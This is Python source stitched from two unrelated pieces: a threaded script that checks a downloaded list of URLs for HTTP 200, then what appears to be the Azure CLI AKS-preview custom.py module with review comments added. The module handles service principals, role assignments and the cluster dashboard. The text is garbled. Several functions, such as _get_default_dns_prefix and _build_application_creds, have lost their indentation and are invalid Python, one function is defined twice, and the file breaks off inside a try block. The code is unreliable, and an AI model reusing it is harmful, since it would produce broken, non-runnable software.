def _download_url_list(url):
    """Fetch the newline-separated URL list and return it as a list of strings.

    Replaces the previous os.system("curl -O ...") + temp-file dance:
    requests is already imported, avoids a shell invocation, and the file
    handle leak (open() without close) goes away entirely.
    """
    response = requests.get(url)
    response.raise_for_status()
    # Drop blank lines so workers never request an empty URL.
    return [line for line in response.text.splitlines() if line]


url_list = _download_url_list(link_url)
url_list_ok = []


def request_url(n, k):
    """Probe every n-th URL (offset k) and record those answering HTTP 200.

    Appending to url_list_ok from multiple threads is safe: list.append is
    atomic under the GIL.
    """
    # range(k, len, n) visits exactly the indices with i % n == k.
    for i in range(k, len(url_list), n):
        try:
            r = requests.get(url_list[i])
            print("pic " + url_list[i] + " " + str(r.status_code))
            if r.status_code == 200:
                url_list_ok.append(url_list[i])
        except requests.RequestException:
            # Narrowed from a bare except: only network/HTTP errors are
            # expected here; anything else is a real bug and should surface.
            print("Error " + url_list[i])


threads = [threading.Thread(target=request_url, args=(10, i)) for i in range(10)]
for t in threads:
    t.start()
for t in threads:
    t.join()

# Mode 'w' truncates on open, replacing the old seek(0)/truncate() dance
# performed on an append-mode handle.
with open("url_ok.txt", "w") as out:
    for pic_url in url_list_ok:
        out.write(pic_url + "\n")
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_11_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE
from ._consts import ADDONS
logger = get_logger(__name__)
def which(binary):
    """Return the full path of *binary* on PATH, or None if not found.

    On Windows the '.exe' suffix is appended before searching. Fixed: a
    missing PATH environment variable no longer raises AttributeError, and
    the redundant exists()+isfile() double check is collapsed (isfile
    implies existence).
    """
    path_var = os.getenv('PATH') or ''
    if platform.system() == 'Windows':
        binary = binary + '.exe'
    # os.pathsep is ';' on Windows and ':' elsewhere — same split as before,
    # without hand-coding the separator per platform.
    for part in path_var.split(os.pathsep):
        bin_path = os.path.join(part, binary)
        # X_OK filters out files that exist but are not executable.
        if os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
            return bin_path
    return None
def wait_then_open(url):
    """
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come
    up, and then open the URL.

    Polls *url* up to 9 times, sleeping 1s after each failure, then opens it
    in a new browser tab regardless of the final outcome.
    """
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            # Reachable: stop polling. (Previously the break sat in the
            # except path, which abandoned the retry loop after the very
            # first URLError instead of retrying.)
            break
        except URLError:
            time.sleep(1)
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
    """
    Spawns a daemon thread that waits for a bit then opens a URL.
    """
    # Fixed: args must be a tuple — ({url}) built a one-element *set*, which
    # only worked by accident of Thread's argument unpacking.
    t = threading.Thread(target=wait_then_open, args=(url,))
    t.daemon = True
    t.start()
def _ssl_context():
    """Return an SSL context for probing URLs.

    Falls back to an explicit TLS protocol on very old Pythons or in Cloud
    Shell on Windows, where create_default_context is not usable.
    """
    needs_legacy = (sys.version_info < (3, 4) or
                    (in_cloud_console() and platform.system() == 'Windows'))
    if not needs_legacy:
        return ssl.create_default_context()
    try:
        # ssl.PROTOCOL_TLS was added in python 2.7.13 and 3.6.
        return ssl.SSLContext(ssl.PROTOCOL_TLS)
    except AttributeError:
        return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
    """Create an AAD application and service principal; return the app id.

    The application is created with a 5-year credential, then service
    principal creation is retried up to 10 times with growing backoff to
    ride out AAD propagation delays. Returns False if every attempt fails.
    """
    # use get_progress_controller
    hook = cli_ctx.get_progress_controller(True)
    # Fixed typo: 'messsage' -> 'message' (the misspelled kwarg meant the
    # progress text was silently dropped).
    hook.add(message='Creating service principal', value=0, total_val=1.0)
    logger.info('Creating service principal')
    # always create application with 5 years expiration
    start_date = datetime.datetime.utcnow()
    end_date = start_date + relativedelta(years=5)
    result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
                                start_date=start_date, end_date=end_date)
    service_principal = result.app_id  # pylint: disable=no-member
    for x in range(0, 10):
        hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
        try:
            create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
            break
        # TODO figure out what exception AAD throws here sometimes.
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            time.sleep(2 + 2 * x)
    else:
        # All 10 attempts failed.
        return False
    hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
    """Create a role assignment, retrying up to 10 times with growing backoff.

    AAD propagation is eventually consistent, so failures are swallowed and
    retried; a CloudError of 'already exists' counts as success. Returns
    True on success, False when every attempt failed.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to propagate')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
        try:
            # TODO: break this out into a shared utility library
            create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
            break
        except CloudError as ex:
            if ex.message == 'The role assignment already exists.':
                break
            logger.info(ex.message)
        except:  # pylint: disable=bare-except
            # Best effort: any other transient failure is retried below.
            pass
        time.sleep(delay + delay * x)
    else:
        # All 10 attempts failed.
        return False
    hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
    logger.info('AAD role propagation done')
    return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete role assignments for *service_principal*, retrying up to 10
    times with growing backoff around AAD propagation delays.

    CLIError aborts immediately (re-raised); CloudError is logged and
    retried. Returns True on success, False when every attempt failed.
    NOTE(review): an identical definition appears again later in this
    module; Python binds the later one at import time.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError as ex:
            raise ex
        except CloudError as ex:
            logger.info(ex)
            time.sleep(delay + delay * x)
    else:
        # All 10 attempts failed.
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    """Persist the service principal/secret for *subscription_id* in the CLI
    config directory, merging with any entries already on disk."""
    entry = {}
    if client_secret:
        entry['client_secret'] = client_secret
    if service_principal:
        entry['service_principal'] = service_principal
    config_path = os.path.join(get_config_dir(), file_name)
    full_config = load_service_principals(config_path=config_path) or {}
    full_config[subscription_id] = entry
    # 0o600: the file holds credentials — keep it owner-readable only.
    fd = os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w+') as sp_file:
        json.dump(full_config, sp_file)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    """Return the stored service-principal entry for *subscription_id*, or
    None when no store exists or it has no entry for this subscription."""
    config_path = os.path.join(get_config_dir(), file_name)
    config = load_service_principals(config_path)
    return config.get(subscription_id) if config else None
def load_service_principals(config_path):
    """Parse the JSON service-principal store at *config_path*.

    Returns None when the file is absent or unreadable/corrupt — callers
    treat a broken store as empty (best effort, hence the bare except).
    """
    if not os.path.exists(config_path):
        return None
    fd = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(fd) as handle:
            return shell_safe_json_parse(handle.read())
    except:  # pylint: disable=bare-except
        return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
                       subscription_id=None):
    """Validate or create an ARM deployment in *resource_group_name*.

    When *validate* is True the template is logged and only validated;
    otherwise the deployment is created (optionally without waiting, per
    *no_wait*). Resource APIs >= 2019-10-01 take a Deployment wrapper
    object; older ones take DeploymentProperties directly.
    """
    from azure.cli.core.profiles import ResourceType
    DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
    smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
                                  subscription_id=subscription_id).deployments
    if validate:
        logger.info('==== BEGIN TEMPLATE ====')
        logger.info(json.dumps(template, indent=2))
        logger.info('==== END TEMPLATE ====')
    if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
        Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
        deployment = Deployment(properties=properties)
        if validate:
            validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
            return LongRunningOperation(cmd.cli_ctx)(validation_poller)
        return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
    # Pre-2019-10-01 API shape: pass the properties object directly.
    if validate:
        return smc.validate(resource_group_name, deployment_name, properties)
    return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None):
    """Create an AAD application via the Graph RBAC client.

    Credential parameters are forwarded to _build_application_creds. A
    GraphErrorException caused by insufficient directory privileges is
    re-raised as a CLIError pointing at the setup documentation.
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
                                                         key_usage=key_usage, start_date=start_date, end_date=end_date)
    app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
                                                   display_name=display_name,
                                                   identifier_uris=identifier_uris,
                                                   homepage=homepage,
                                                   reply_urls=reply_urls,
                                                   key_credentials=key_creds,
                                                   password_credentials=password_creds)
    try:
        return client.create(app_create_param)
    except GraphErrorException as ex:
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create a service principal for an existing AAD application.

    *identifier* may be an appId GUID, an identifier URI, or an application
    object id; when *resolve_app* is set it is resolved to the appId first.
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)
    if resolve_app:
        try:
            # A parseable GUID means we were given an appId; anything else
            # is treated as an identifier URI.
            uuid.UUID(identifier)
            result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
        except ValueError:
            result = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))
        if not result:  # assume we get an object id
            result = [rbac_client.applications.get(identifier)]
        app_id = result[0].app_id
    else:
        app_id = identifier
    return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
    """Assign *role* to *assignee*.

    The assignee is resolved from a client id to an object id only when it
    is a service principal; MSI ids are already object ids.
    """
    return _create_role_assignment(
        cli_ctx, role, assignee, resource_group_name, scope,
        resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
                            resource_group_name=None, scope=None, resolve_assignee=True):
    """Create a role assignment at *scope* (or one built from the resource group).

    *role* may be a name or uuid and is resolved to a definition id. The
    assignee is resolved from a service-principal client id to an object id
    unless *resolve_assignee* is False.
    """
    from azure.cli.core.profiles import ResourceType, get_sdk
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
    # XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
    # ref: https://github.com/Azure/azure-cli/issues/2458
    role_id = _resolve_role_id(role, scope, definitions_client)
    # If the cluster has service principal resolve the service principal client id to get the object id,
    # if not use MSI object id.
    object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
    RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                             'RoleAssignmentCreateParameters', mod='models',
                                             operation_group='role_assignments')
    parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
    # Assignment names are arbitrary GUIDs.
    assignment_name = uuid.uuid4()
    custom_headers = None
    return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None):
    """Delete role assignments, either by explicit assignment ids or by
    assignee/role/scope filters.

    :param ids: assignment ids; mutually exclusive with all other filters.
    :param yes: skip the "delete everything" confirmation prompt.
    :raises CLIError: when ids are combined with other filters.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError('When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # No filter at all would wipe every assignment in the subscription: confirm first.
    # (Fixed: the original list contained `assignee` twice and the always-empty `ids`.)
    if not any([assignee, role, resource_group_name, scope, yes]):
        from knack.prompting import prompt_y_n
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return
    scope = _build_role_scope(resource_group_name, scope,
                              assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False)
    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete the role assignment for *service_principal*, retrying to ride out
    AAD replication delays.

    Retries up to 10 times with a linearly growing sleep on CloudError;
    CLIError is considered fatal and re-raised immediately.

    :returns: True on success, False when all retries were exhausted.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError:
            # Fixed: bare `raise` preserves the original traceback (was `raise ex`).
            raise
        except CloudError as ex:
            logger.info(ex)
        time.sleep(delay + delay * x)
    else:
        # Loop completed without a successful delete.
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups):
    """List role assignments, optionally filtered by scope, assignee and role.

    :param scope: when given, assignments are listed at this scope (takes
        precedence over the assignee filter, so management-group scopes work).
    :param assignee: UPN, service principal name or object id; resolved to an
        AAD object id before filtering.
    :param include_inherited: also keep assignments whose stored scope matches
        the requested scope as a regex prefix (parent scopes).
    :param include_groups: use the server-side "assignedTo" filter, which also
        matches assignments granted via group membership.
    """
    assignee_object_id = None
    if assignee:
        assignee_object_id = _resolve_object_id(cli_ctx, assignee)
    # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())
    if assignments:
        # Precedence: (not scope) OR (include_inherited AND re.match(...)) OR exact match.
        # NOTE(review): re.match uses the assignment's scope as the *pattern* and the
        # requested scope as the string — presumably so parent scopes match as prefixes;
        # confirm before touching this expression.
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]
        if role:
            role_id = _resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]
        # Client-side principal filter is needed for the scope branch, which is
        # not filtered by principal server-side.
        if assignee_object_id:
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]
    return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
    """Resolve *assignee* (UPN, service principal name, or object id) to an
    AAD object id via the graph API.

    :raises CLIError: when nothing in the graph matches.
    """
    client = get_graph_rbac_management_client(cli_ctx)
    matches = None
    if '@' in assignee:  # looks like a user principal name
        matches = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
    if not matches:
        matches = list(client.service_principals.list(
            filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
    if not matches:  # assume an object id, let us verify it
        matches = _get_object_stubs(client, [assignee])
    # 2+ matches should never happen, so we only check 'no match' here
    if not matches:
        raise CLIError("No matches in graph database for '{}'".format(assignee))
    return matches[0].object_id
def _get_object_stubs(graph_client, assignees):
    """Fetch directory-object stubs for the given object ids."""
    query = GetObjectsParameters(include_directory_object_references=True,
                                 object_ids=assignees)
    return list(graph_client.objects.get_objects_by_object_ids(query))
def subnet_role_assignment_exists(cli_ctx, scope):
    """Return True when a 'Network Contributor' assignment already exists
    exactly at *scope* (a subnet resource id)."""
    network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
    assignments_client = get_auth_management_client(cli_ctx, scope).role_assignments
    return any(
        a.scope == scope and a.role_definition_id.endswith(network_contributor_role_id)
        for a in assignments_client.list_for_scope(scope=scope, filter='atScope()'))
# Parses a user-assigned managed identity ARM resource id into three capture
# groups: (1) subscription id, (2) resource group, (3) identity name.
# Matched case-insensitively against a lower-cased resource id.
_re_user_assigned_identity_resource_id = re.compile(
    r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
    flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
    """Fetch the user-assigned managed identity object for *resource_id*.

    :raises CLIError: when the id cannot be parsed or the identity is missing.
    """
    msi_client = get_msi_client(cli_ctx)
    resource_id = resource_id.lower()
    match = _re_user_assigned_identity_resource_id.search(resource_id)
    if not match:
        raise CLIError("Cannot parse identity name from provided resource id {}.".format(resource_id))
    resource_group_name = match.group(2)
    identity_name = match.group(3)
    try:
        return msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
                                                       resource_name=identity_name)
    except CloudError as ex:
        if 'was not found' in ex.message:
            raise CLIError("Identity {} not found.".format(resource_id))
        raise CLIError(ex.message)
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
    """Return the client id of the user-assigned identity at *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.client_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements,too-many-branches
               client,
               resource_group_name,
               name,
               disable_browser=False,
               listen_address='127.0.0.1',
               listen_port='8001'):
    """Open a browser on the cluster's Kubernetes dashboard, or on the Azure
    portal's Kubernetes resources view when the kube-dashboard addon is
    disabled or the cluster runs Kubernetes >= 1.19.0.

    Locally this runs ``kubectl proxy``; in Cloud Shell it opens a tunnel port
    via the console's local helper service instead.
    """
    # verify the kube-dashboard addon was not disabled
    instance = client.get(resource_group_name, name)
    addon_profiles = instance.addon_profiles or {}
    # addon name is case insensitive
    addon_profile = next((addon_profiles[k] for k in addon_profiles
                          if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
                         ManagedClusterAddonProfile(enabled=False))
    # open portal view if addon is not enabled or k8s version >= 1.19.0
    if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
        subscription_id = get_subscription_id(cmd.cli_ctx)
        dashboardURL = (
            cmd.cli_ctx.cloud.endpoints.portal + # Azure Portal URL (https://portal.azure.com for public cloud)
            ('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
             '/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
        )
        if in_cloud_console():
            logger.warning('To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
        else:
            logger.warning('Kubernetes resources view on %s', dashboardURL)
        if not disable_browser:
            webbrowser.open_new_tab(dashboardURL)
        return
    # otherwise open the kube-dashboard addon
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    _, browse_path = tempfile.mkstemp()
    # write cluster credentials to a temp kubeconfig used by all kubectl calls below
    aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
    # find the dashboard pod's name
    try:
        dashboard_pod = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
            universal_newlines=True)
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard pod: {}'.format(err))
    if dashboard_pod:
        # remove any "pods/" or "pod/" prefix from the name
        dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
    else:
        raise CLIError("Couldn't find the Kubernetes dashboard pod.")
    # find the port
    try:
        dashboard_port = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--selector", "k8s-app=kubernetes-dashboard",
             "--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
        )
        # output format: b"'{port}'"
        dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard port: {}'.format(err))
    # use https if dashboard container is using https
    if dashboard_port == 8443:
        protocol = 'https'
    else:
        protocol = 'http'
    proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
    dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
                                                                                                        protocol)
    # launch kubectl port-forward locally to access the remote dashboard
    if in_cloud_console():
        # TODO: better error handling here.
        response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
        result = json.loads(response.text)
        dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
            result['url'], protocol)
        term_id = os.environ.get('ACC_TERM_ID')
        if term_id:
            response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
                                     json={"url": dashboardURL})
        logger.warning('To view the console, please open %s in a new tab', dashboardURL)
    else:
        logger.warning('Proxy running on %s', proxy_url)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async(dashboardURL)
    try:
        try:
            subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
                                     listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            # BUG FIX: the original tested `err.output.find(b'...')`, which is truthy
            # for every index except 0 (find returns -1 when absent), so the fallback
            # fired on almost any error. Use a membership test instead.
            if b'unknown flag: --address' in err.output:
                if listen_address != '127.0.0.1':
                    logger.warning('"--address" is only supported in kubectl v1.13 and later.')
                    logger.warning('The "--listen-address" argument will be ignored.')
                subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
    except KeyboardInterrupt:
